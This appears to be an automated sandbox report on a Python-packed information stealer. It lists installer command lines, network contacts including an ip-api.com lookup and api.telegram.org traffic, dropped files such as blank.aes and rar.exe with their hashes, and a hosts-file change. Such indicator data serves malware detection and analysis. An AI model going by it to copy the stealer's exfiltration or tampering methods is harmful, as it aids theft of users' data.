C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe install "Microsoft.Office.Tools.v4.0.Framework, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a" /queue:3 /NoDependencies

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe install "Microsoft.Office.Tools.v4.0.Framework, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a" /queue:3 /NoDependencies

C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe install "Microsoft.Office.Tools, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a" /queue:3 /NoDependencies

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe install "Microsoft.Office.Tools, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a" /queue:3 /NoDependencies

C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe install "Microsoft.Office.Tools.Common, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a" /queue:3 /NoDependencies

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe install "Microsoft.Office.Tools.Common, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a" /queue:3 /NoDependencies

C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe install "Microsoft.Office.Tools.Excel, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a" /queue:3 /NoDependencies

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe install "Microsoft.Office.Tools.Excel, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a" /queue:3 /NoDependencies

C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe install "Microsoft.Office.Tools.Outlook, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a" /queue:3 /NoDependencies

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe install "Microsoft.Office.Tools.Outlook, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a" /queue:3 /NoDependencies

C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe install "Microsoft.Office.Tools.Word, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a" /queue:3 /NoDependencies

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe install "Microsoft.Office.Tools.Word, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a" /queue:3 /NoDependencies

C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe install "Microsoft.Office.Tools.Common.Implementation, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a" /queue:3 /NoDependencies

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe install "Microsoft.Office.Tools.Common.Implementation, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a" /queue:3 /NoDependencies

C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe install "Microsoft.Office.Tools.Excel.Implementation, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a" /queue:3 /NoDependencies

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe install "Microsoft.Office.Tools.Excel.Implementation, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a" /queue:3 /NoDependencies

C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe install "Microsoft.Office.Tools.Outlook.Implementation, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a" /queue:3 /NoDependencies

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe install "Microsoft.Office.Tools.Outlook.Implementation, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a" /queue:3 /NoDependencies

C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe install "Microsoft.Office.Tools.Word.Implementation, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a" /queue:3 /NoDependencies

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe install "Microsoft.Office.Tools.Word.Implementation, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a" /queue:3 /NoDependencies

C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe install "Microsoft.VisualStudio.Tools.Office.ContainerControl, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a" /queue:3 /NoDependencies

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe install "Microsoft.VisualStudio.Tools.Office.ContainerControl, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a" /queue:3 /NoDependencies

C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe install "Microsoft.VisualStudio.Tools.Office.Runtime, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a" /queue:3 /NoDependencies

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe install "Microsoft.VisualStudio.Tools.Office.Runtime, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a" /queue:3 /NoDependencies

C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe install "Microsoft.VisualStudio.Tools.Office.Runtime.Internal, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a" /queue:3 /NoDependencies

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe install "Microsoft.VisualStudio.Tools.Office.Runtime.Internal, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a" /queue:3 /NoDependencies

C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe update /queue

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe update /queue

C:\Windows\Microsoft.NET\Framework64\v3.5\addinutil.exe

"C:\Windows\Microsoft.NET\Framework64\v3.5\addinutil.exe" -PipelineRoot:"C:\Program Files (x86)\Common Files\Microsoft Shared\VSTA\Pipeline.v10.0\." -Rebuild

C:\Windows\Microsoft.NET\Framework64\v3.5\addinutil.exe

"C:\Windows\Microsoft.NET\Framework64\v3.5\addinutil.exe" -AddInRoot:"C:\Program Files (x86)\Common Files\Microsoft Shared\VSTA\AppInfoDocument\." -Rebuild

C:\Windows\SysWOW64\msiexec.exe

"C:\Windows\System32\msiexec.exe" /i "C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\2005\x86\vcredist.msi" /qb

C:\Windows\syswow64\MsiExec.exe

C:\Windows\syswow64\MsiExec.exe -Embedding E5398D23008E2AE9D54A86180E9537C1

C:\Windows\SysWOW64\msiexec.exe

"C:\Windows\System32\msiexec.exe" /i "C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\2008\x86\vc_red.msi" /qb

C:\Windows\SysWOW64\msiexec.exe

"C:\Windows\System32\msiexec.exe" /i "C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\2010\x86\vc_red.msi" /qb

C:\Windows\SysWOW64\msiexec.exe

"C:\Windows\System32\msiexec.exe" /i "C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\2012\x86\vc_runtimeMinimum_x86.msi" /qb

C:\Windows\SysWOW64\msiexec.exe

"C:\Windows\System32\msiexec.exe" /i "C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\2012\x86\vc_runtimeAdditional_x86.msi" /qb

C:\Windows\SysWOW64\msiexec.exe

"C:\Windows\System32\msiexec.exe" /i "C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\2013\x86\vc_runtimeMinimum_x86.msi" /qb

C:\Windows\SysWOW64\msiexec.exe

"C:\Windows\System32\msiexec.exe" /i "C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\2013\x86\vc_runtimeAdditional_x86.msi" /qb

C:\Windows\SysWOW64\msiexec.exe

"C:\Windows\System32\msiexec.exe" /i "C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\2022\x86\vc_runtimeMinimum_x86.msi" /qb

C:\Windows\SysWOW64\msiexec.exe

"C:\Windows\System32\msiexec.exe" /i "C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\2022\x86\vc_runtimeAdditional_x86.msi" /qb

C:\Windows\system32\reg.exe

reg query hklm\software\wow6432node\microsoft\windows\currentversion\uninstall\{C5E3A69D-D391-45A6-A8FB-00B01E2B010D} /v UninstallString

C:\Windows\system32\reg.exe

reg query hklm\software\wow6432node\microsoft\windows\currentversion\uninstall\{C5E3A69D-D392-45A6-A8FB-00B01E2B010D} /v UninstallString

C:\Windows\system32\msiexec.exe

MsiExec.exe /X{C5E3A69D-D392-45A6-A8FB-00B01E2B010D} /passive /norestart

C:\Windows\system32\msiexec.exe

MsiExec.exe /X{C5E3A69D-D393-45A6-A8FB-00B01E2B010D} /passive /norestart

C:\Windows\SysWOW64\msiexec.exe

"C:\Windows\System32\msiexec.exe" /i "C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\vbc\vbcrun.msi" /qb

Network

Country Destination Domain Proto
US 8.8.8.8:53 blank-knrsz.in udp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 1.112.95.208.in-addr.arpa udp
GB 172.217.16.227:443 gstatic.com tcp
US 208.95.112.1:80 ip-api.com tcp
NL 149.154.167.220:443 api.telegram.org tcp
GB 142.250.187.196:443 www.google.com tcp
GB 142.250.187.196:443 www.google.com udp
GB 142.250.200.14:443 apis.google.com tcp
US 8.8.8.8:53 196.187.250.142.in-addr.arpa udp
US 8.8.8.8:53 227.212.58.216.in-addr.arpa udp
US 8.8.8.8:53 14.200.250.142.in-addr.arpa udp
GB 142.250.179.238:443 play.google.com tcp
GB 142.250.187.238:443 clients2.google.com tcp
N/A 224.0.0.251:5353 udp
GB 172.217.169.67:443 beacons.gcp.gvt2.com tcp
GB 142.250.187.227:443 id.google.com tcp
GB 142.250.179.238:443 play.google.com udp
GB 172.217.169.67:443 beacons.gcp.gvt2.com udp
GB 20.26.156.215:443 github.com tcp
GB 20.26.156.215:443 github.com tcp
US 185.199.109.133:443 avatars.githubusercontent.com tcp
US 185.199.108.154:443 github.githubassets.com tcp
US 185.199.108.154:443 github.githubassets.com tcp
US 185.199.108.154:443 github.githubassets.com tcp
US 185.199.108.154:443 github.githubassets.com tcp
US 185.199.108.154:443 github.githubassets.com tcp
US 185.199.108.154:443 github.githubassets.com tcp
US 185.199.109.133:443 avatars.githubusercontent.com tcp
US 185.199.108.154:443 github.githubassets.com tcp
US 185.199.108.154:443 github.githubassets.com tcp
US 185.199.108.154:443 github.githubassets.com tcp
US 140.82.112.21:443 collector.github.com tcp
US 140.82.112.21:443 collector.github.com tcp
GB 20.26.156.210:443 api.github.com tcp
GB 172.217.169.67:443 beacons.gcp.gvt2.com udp

Files

C:\Users\Admin\AppData\Local\Temp\_MEI39762\python311.dll

MD5 5792adeab1e4414e0129ce7a228eb8b8
SHA1 e9f022e687b6d88d20ee96d9509f82e916b9ee8c
SHA256 7e1370058177d78a415b7ed113cc15472974440d84267fc44cdc5729535e3967
SHA512 c8298b5780a2a5eebed070ac296eda6902b0cac9fda7bb70e21f482d6693d6d2631ca1ac4be96b75ac0dd50c9ca35be5d0aca9c4586ba7e58021edccd482958b

C:\Users\Admin\AppData\Local\Temp\_MEI39762\VCRUNTIME140.dll

MD5 4585a96cc4eef6aafd5e27ea09147dc6
SHA1 489cfff1b19abbec98fda26ac8958005e88dd0cb
SHA256 a8f950b4357ec12cfccddc9094cca56a3d5244b95e09ea6e9a746489f2d58736
SHA512 d78260c66331fe3029d2cc1b41a5d002ec651f2e3bbf55076d65839b5e3c6297955afd4d9ab8951fbdc9f929dbc65eb18b14b59bce1f2994318564eb4920f286

memory/2244-25-0x00007FFB06750000-0x00007FFB06D39000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\_MEI39762\base_library.zip

MD5 2f6d57bccf7f7735acb884a980410f6a
SHA1 93a6926887a08dc09cd92864cd82b2bec7b24ec5
SHA256 1b7d326bad406e96a4c83b5a49714819467e3174ed0a74f81c9ebd96d1dd40b3
SHA512 95bcfc66dbe7b6ad324bd2dc2258a3366a3594bfc50118ab37a2a204906109e42192fb10a91172b340cc28c12640513db268c854947fb9ed8426f214ff8889b4

C:\Users\Admin\AppData\Local\Temp\_MEI39762\libffi-8.dll

MD5 08b000c3d990bc018fcb91a1e175e06e
SHA1 bd0ce09bb3414d11c91316113c2becfff0862d0d
SHA256 135c772b42ba6353757a4d076ce03dbf792456143b42d25a62066da46144fece
SHA512 8820d297aeda5a5ebe1306e7664f7a95421751db60d71dc20da251bcdfdc73f3fd0b22546bd62e62d7aa44dfe702e4032fe78802fb16ee6c2583d65abc891cbf

C:\Users\Admin\AppData\Local\Temp\_MEI39762\_ctypes.pyd

MD5 1adfe4d0f4d68c9c539489b89717984d
SHA1 8ae31b831b3160f5b88dda58ad3959c7423f8eb2
SHA256 64e8fd952ccf5b8adca80ce8c7bc6c96ec7df381789256fe8d326f111f02e95c
SHA512 b403cc46e0874a75e3c0819784244ed6557eae19b0d76ffd86f56b3739db10ea8deec3dc1ca9e94c101263d0ccf506978443085a70c3ab0816885046b5ef5117

C:\Users\Admin\AppData\Local\Temp\_MEI39762\_lzma.pyd

MD5 3798175fd77eded46a8af6b03c5e5f6d
SHA1 f637eaf42080dcc620642400571473a3fdf9174f
SHA256 3c9d5a9433b22538fc64141cd3784800c567c18e4379003329cf69a1d59b2a41
SHA512 1f7351c9e905265625d725551d8ea1de5d9999bc333d29e6510a5bca4e4d7c1472b2a637e892a485a7437ea4768329e5365b209dd39d7c1995fe3317dc5aecdf

memory/2244-48-0x00007FFB104B0000-0x00007FFB104BF000-memory.dmp

memory/2244-47-0x00007FFB0AB70000-0x00007FFB0AB93000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\_MEI39762\_hashlib.pyd

MD5 f10d896ed25751ead72d8b03e404ea36
SHA1 eb8e0fd6e2356f76b5ea0cb72ab37399ec9d8ecb
SHA256 3660b985ca47ca1bba07db01458b3153e4e692ee57a8b23ce22f1a5ca18707c3
SHA512 7f234e0d197ba48396fabd1fccc2f19e5d4ad922a2b3fe62920cd485e5065b66813b4b2a2477d2f7f911004e1bc6e5a6ec5e873d8ff81e642fee9e77b428fb42

C:\Users\Admin\AppData\Local\Temp\_MEI39762\_decimal.pyd

MD5 a8952538e090e2ff0efb0ba3c890cd04
SHA1 cdc8bd05a3178a95416e1c15b6c875ee026274df
SHA256 c4e8740c5dbbd2741fc4124908da4b65fa9c3e17d9c9bf3f634710202e0c7009
SHA512 5c16f595f17bedaa9c1fdd14c724bbb404ed59421c63f6fbd3bfd54ce8d6f550147d419ec0430d008c91b01b0c42934c2a08dae844c308feec077da713ac842e

C:\Users\Admin\AppData\Local\Temp\_MEI39762\_bz2.pyd

MD5 2d461b41f6e9a305dde68e9c59e4110a
SHA1 97c2266f47a651e37a72c153116d81d93c7556e8
SHA256 abbe3933a34a9653a757244e8e55b0d7d3a108527a3e9e8a7f2013b5f2a9eff4
SHA512 eef132df6e52eb783bad3e6af0d57cb48cda2eb0edb6e282753b02d21970c1eea6bab03c835ff9f28f2d3e25f5e9e18f176a8c5680522c09da358a1c48cf14c8

C:\Users\Admin\AppData\Local\Temp\_MEI39762\unicodedata.pyd

MD5 c2556dc74aea61b0bd9bd15e9cd7b0d6
SHA1 05eff76e393bfb77958614ff08229b6b770a1750
SHA256 987a6d21ce961afeaaa40ba69859d4dd80d20b77c4ca6d2b928305a873d6796d
SHA512 f29841f262934c810dd1062151aefac78cd6a42d959a8b9ac832455c646645c07fd9220866b262de1bc501e1a9570591c0050d5d3607f1683437dea1ff04c32b

C:\Users\Admin\AppData\Local\Temp\_MEI39762\select.pyd

MD5 90fea71c9828751e36c00168b9ba4b2b
SHA1 15b506df7d02612e3ba49f816757ad0c141e9dc1
SHA256 5bbbb4f0b4f9e5329ba1d518d6e8144b1f7d83e2d7eaf6c50eef6a304d78f37d
SHA512 e424be422bf0ef06e7f9ff21e844a84212bfa08d7f9fbd4490cbbcb6493cc38cc1223aaf8b7c9cd637323b81ee93600d107cc1c982a2288eb2a0f80e2ad1f3c5

C:\Users\Admin\AppData\Local\Temp\_MEI39762\rarreg.key

MD5 4531984cad7dacf24c086830068c4abe
SHA1 fa7c8c46677af01a83cf652ef30ba39b2aae14c3
SHA256 58209c8ab4191e834ffe2ecd003fd7a830d3650f0fd1355a74eb8a47c61d4211
SHA512 00056f471945d838ef2ce56d51c32967879fe54fcbf93a237ed85a98e27c5c8d2a39bc815b41c15caace2071edd0239d775a31d1794dc4dba49e7ecff1555122

C:\Users\Admin\AppData\Local\Temp\_MEI39762\rar.exe

MD5 9c223575ae5b9544bc3d69ac6364f75e
SHA1 8a1cb5ee02c742e937febc57609ac312247ba386
SHA256 90341ac8dcc9ec5f9efe89945a381eb701fe15c3196f594d9d9f0f67b4fc2213
SHA512 57663e2c07b56024aaae07515ee3a56b2f5068ebb2f2dc42be95d1224376c2458da21c965aab6ae54de780cb874c2fc9de83d9089abf4536de0f50faca582d09

C:\Users\Admin\AppData\Local\Temp\_MEI39762\libssl-1_1.dll

MD5 8e8a145e122a593af7d6cde06d2bb89f
SHA1 b0e7d78bb78108d407239e9f1b376e0c8c295175
SHA256 a6a14c1beccbd4128763e78c3ec588f747640297ffb3cc5604a9728e8ef246b1
SHA512 d104d81aca91c067f2d69fd8cec3f974d23fb5372a8f2752ad64391da3dbf5ffe36e2645a18a9a74b70b25462d73d9ea084318846b7646d39ce1d3e65a1c47c4

C:\Users\Admin\AppData\Local\Temp\_MEI39762\libcrypto-1_1.dll

MD5 dffcab08f94e627de159e5b27326d2fc
SHA1 ab8954e9ae94ae76067e5a0b1df074bccc7c3b68
SHA256 135b115e77479eedd908d7a782e004ece6dd900bb1ca05cc1260d5dd6273ef15
SHA512 57e175a5883edb781cdb2286167d027fdb4b762f41fb1fc9bd26b5544096a9c5dda7bccbb6795dcc37ed5d8d03dc0a406bf1a59adb3aeb41714f1a7c8901a17d

C:\Users\Admin\AppData\Local\Temp\_MEI39762\_ssl.pyd

MD5 2089768e25606262921e4424a590ff05
SHA1 bc94a8ff462547ab48c2fbf705673a1552545b76
SHA256 3e6e9fc56e1a9fe5edb39ee03e5d47fa0e3f6adb17be1f087dc6f891d3b0bbca
SHA512 371aa8e5c722307fff65e00968b14280ee5046cfcf4a1d9522450688d75a3b0362f2c9ec0ec117b2fc566664f2f52a1b47fe62f28466488163f9f0f1ce367f86

C:\Users\Admin\AppData\Local\Temp\_MEI39762\_sqlite3.pyd

MD5 eb6313b94292c827a5758eea82d018d9
SHA1 7070f715d088c669eda130d0f15e4e4e9c4b7961
SHA256 6b41dfd7d6ac12afe523d74a68f8bd984a75e438dcf2daa23a1f934ca02e89da
SHA512 23bfc3abf71b04ccffc51cedf301fadb038c458c06d14592bf1198b61758810636d9bbac9e4188e72927b49cb490aeafa313a04e3460c3fb4f22bdddf112ae56

C:\Users\Admin\AppData\Local\Temp\_MEI39762\_socket.pyd

MD5 bcc3e26a18d59d76fd6cf7cd64e9e14d
SHA1 b85e4e7d300dbeec942cb44e4a38f2c6314d3166
SHA256 4e19f29266a3d6c127e5e8de01d2c9b68bc55075dd3d6aabe22cf0de4b946a98
SHA512 65026247806feab6e1e5bf2b29a439bdc1543977c1457f6d3ddfbb7684e04f11aba10d58cc5e7ea0c2f07c8eb3c9b1c8a3668d7854a9a6e4340e6d3e43543b74

C:\Users\Admin\AppData\Local\Temp\_MEI39762\_queue.pyd

MD5 decdabaca104520549b0f66c136a9dc1
SHA1 423e6f3100013e5a2c97e65e94834b1b18770a87
SHA256 9d4880f7d0129b1de95becd8ea8bbbf0c044d63e87764d18f9ec00d382e43f84
SHA512 d89ee3779bf7d446514fc712dafb3ebc09069e4f665529a7a1af6494f8955ceb040bef7d18f017bcc3b6fe7addeab104535655971be6eed38d0fc09ec2c37d88

C:\Users\Admin\AppData\Local\Temp\_MEI39762\sqlite3.dll

MD5 395332e795cb6abaca7d0126d6c1f215
SHA1 b845bd8864cd35dcb61f6db3710acc2659ed9f18
SHA256 8e8870dac8c96217feff4fa8af7c687470fbccd093d97121bc1eac533f47316c
SHA512 8bc8c8c5f10127289dedb012b636bc3959acb5c15638e7ed92dacdc8d8dba87a8d994aaffc88bc7dc89ccfeef359e3e79980dfa293a9acae0dc00181096a0d66

C:\Users\Admin\AppData\Local\Temp\_MEI39762\blank.aes

MD5 c4aff7b59167339347f367f3ded166cc
SHA1 f6e2e049c41daaeb41f53b618c3e5ac6a82b376e
SHA256 ffe6d48a882d25b4806b040b45b2a4d950ff263d3d1e7464258e792049ed1f93
SHA512 4b1018906a0387728835f55e54bb2d15ccbf863f64f1fd52b42508eb2d340779b3997900fda646ab5fa946d52dcdb326fe9662c1e840d23b3e2d6ca03d661b17

memory/2244-54-0x00007FFB0AB00000-0x00007FFB0AB2D000-memory.dmp

memory/2244-57-0x00007FFB0C250000-0x00007FFB0C269000-memory.dmp

memory/2244-60-0x00007FFB06E40000-0x00007FFB06FB7000-memory.dmp

memory/2244-59-0x00007FFB0A7E0000-0x00007FFB0A803000-memory.dmp

memory/2244-64-0x00007FFB104A0000-0x00007FFB104AD000-memory.dmp

memory/2244-63-0x00007FFB0C160000-0x00007FFB0C179000-memory.dmp

memory/2244-66-0x00007FFB0A7B0000-0x00007FFB0A7DE000-memory.dmp

memory/2244-70-0x00007FFB06750000-0x00007FFB06D39000-memory.dmp

memory/2244-73-0x0000023B61B20000-0x0000023B61E98000-memory.dmp

memory/2244-71-0x00007FFB06690000-0x00007FFB06748000-memory.dmp

memory/2244-72-0x00007FFAF5620000-0x00007FFAF5998000-memory.dmp

memory/2244-78-0x00007FFB0ADF0000-0x00007FFB0ADFD000-memory.dmp

memory/2244-77-0x00007FFB0AB70000-0x00007FFB0AB93000-memory.dmp

memory/2244-80-0x00007FFB06440000-0x00007FFB0655C000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_0hbksl1d.oro.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/1720-89-0x000001CB36A90000-0x000001CB36AB2000-memory.dmp

memory/2244-75-0x00007FFB0A790000-0x00007FFB0A7A4000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

MD5 627073ee3ca9676911bee35548eff2b8
SHA1 4c4b68c65e2cab9864b51167d710aa29ebdcff2e
SHA256 85b280a39fc31ba1e15fb06102a05b8405ff3b82feb181d4170f04e466dd647c
SHA512 3c5f6c03e253b83c57e8d6f0334187dbdcdf4fa549eecd36cbc1322dca6d3ca891dc6a019c49ec2eafb88f82d0434299c31e4dfaab123acb42e0546218f311fb

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 2e8eb51096d6f6781456fef7df731d97
SHA1 ec2aaf851a618fb43c3d040a13a71997c25bda43
SHA256 96bfd9dd5883329927fe8c08b8956355a1a6ceb30ceeb5d4252b346df32bc864
SHA512 0a73dc9a49f92d9dd556c2ca2e36761890b3538f355ee1f013e7cf648d8c4d065f28046cd4a167db3dea304d1fbcbcea68d11ce6e12a3f20f8b6c018a60422d2

C:\Windows\System32\drivers\etc\hosts

MD5 f99e42cdd8b2f9f1a3c062fe9cf6e131
SHA1 e32bdcab8da0e3cdafb6e3876763cee002ab7307
SHA256 a040d43136f2f4c41a4875f895060fb910267f2ffad2e3b1991b15c92f53e0f0
SHA512 c55a5e440326c59099615b21d0948cdc2a42bd9cf5990ec88f69187fa540d8c2e91aebe6a25ed8359a47be29d42357fec4bd987ca7fae0f1a6b6db18e1c320a6

\??\c:\Users\Admin\AppData\Local\Temp\fzupxqpe\fzupxqpe.cmdline

MD5 9591920eb6bd00a48fea51c6acdeb069
SHA1 e37b22ab01317777bbdec5396fa792914c548ac9
SHA256 35521bb0d77d021ea24d4fae7bd6f6f1d1159fa9d0a1c8e6e9e6eb8232cd3aba
SHA512 d7d21aafa3af45238498dc47efe3d2832fb5e91cea123be9dbe68129d8d7f979fb1c6c92caa60b5d2a844eff4ee9de171be4894ff580c31888cd754e233aa421

\??\c:\Users\Admin\AppData\Local\Temp\fzupxqpe\fzupxqpe.0.cs

MD5 c76055a0388b713a1eabe16130684dc3
SHA1 ee11e84cf41d8a43340f7102e17660072906c402
SHA256 8a3cd008e86a3d835f55f8415f5fd264c6dacdf0b7286e6854ea3f5a363390e7
SHA512 22d2804491d90b03bb4b640cb5e2a37d57766c6d82caf993770dcf2cf97d0f07493c870761f3ecea15531bd434b780e13ae065a1606681b32a77dbf6906fb4e2

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 de72a228bcabf1530b028259a45904a8
SHA1 8f584cd6b0e728a72e8fea86aeed8c308a80c95e
SHA256 3aa6fc7f1a9f4947c43dd2a3533a4db67bc89774b9eaa4f31279a1ff223b4411
SHA512 762d5ff80a9fe0c2361d5a50a65b4625ca30a65fefeda8a52c7dd41a79162e3fe6f8623808730d07fe1b199e514b9fe3937926891beb5113119469d4fcd3e4a2

\??\c:\Users\Admin\AppData\Local\Temp\fzupxqpe\CSCCB5053CCBF4E41E0A6A54F7BBD1DBC3.TMP

MD5 b3e97910f62e087a322650595ef8b975
SHA1 f0b0968bdb45ed2a28b46f9570604dd3a50bdecd
SHA256 2011b7e5a7c1240678993e2f210e1cd284f1ae717901e03fc0f229ab7d9d0085
SHA512 63e97f8476f9fd5beb6fcf67ded5eb7aac9496ce8c2d6cac4be4d23a246808062b5c810ee8b2139dd101226802d625060bf1056a858ffe998f740b80cb5ca54e

C:\Users\Admin\AppData\Local\Temp\RES3C4D.tmp

MD5 524bf1288d45302048b0d19abd451494
SHA1 ee52e0c7e49dfe4d23ab1787afba7b54d54df43b
SHA256 ee19a08eea83e9f625b5081318262ab1d35658245e31ddfb38b0fbdc40e4cdac
SHA512 0497cba274e79be731062d18136d41891bcc46cbecef420dd81501935e22a69740f7e93f10e6a20ba01adffca3f794a100edf1832c5c635153341e7922260ee5

C:\Users\Admin\AppData\Local\Temp\fzupxqpe\fzupxqpe.dll

MD5 f30c4cccfc27f5e995b4c046db5b28dd
SHA1 313c6657423300947fd1cbe33a46c62868bf8f53
SHA256 27f19e91fa3e920c1ec779d77c6da47982b135f5ce4acf5394c184257b7497cc
SHA512 811a33ab729dc6d65a2e5880acd0c1227ef7b65394b368486df83b10320ba034881ade89300f2b832e3664a12092d3e1bf5c91bd32141adcbec807cf8ebe5d3a

memory/568-204-0x000001DE58CE0000-0x000001DE58CE8000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 6b1bdf0cfa77d24b88d9f997b502c1cf
SHA1 86020bf1d45e42663ffc31f1107d3b3e4438b73f
SHA256 fa1ecd17338664496a53863c4cf609f815280b598db3cb439edf22ddad80507f
SHA512 412b370b18cdc6de421f9be991e6f452862d41600dc9f6783cbec721917b205e527db0fe5f4ddafa2ecc3361290cca05a6bcfca5bd2cb4b954a3bdc10fe98e4b

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

